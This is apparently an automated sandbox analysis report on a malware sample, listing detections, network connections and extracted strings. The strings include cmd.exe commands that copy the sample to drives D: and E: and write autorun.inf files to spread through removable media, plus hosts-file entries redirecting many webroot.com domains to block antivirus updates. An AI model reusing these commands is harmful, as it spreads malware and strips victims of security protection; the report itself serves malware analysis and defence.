Source: IPrstVM17M.exe |
ReversingLabs: Detection: 15% |
Source: IPrstVM17M.exe |
Virustotal: Detection: 14% |
Perma Link |
Source: C:\Users\user\AppData\Local\Temp\bin.exe |
Joe Sandbox ML: detected |
Source: IPrstVM17M.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: unknown |
HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2 |
Source: IPrstVM17M.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: |
Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr |
Source: |
Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr |
Source: IPrstVM17M.exe |
Binary or memory string: echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo open=bin.exe >> D:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo open=bin.exe >> E:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo open=bin.exe >> D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo open=bin.exe >> E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1 |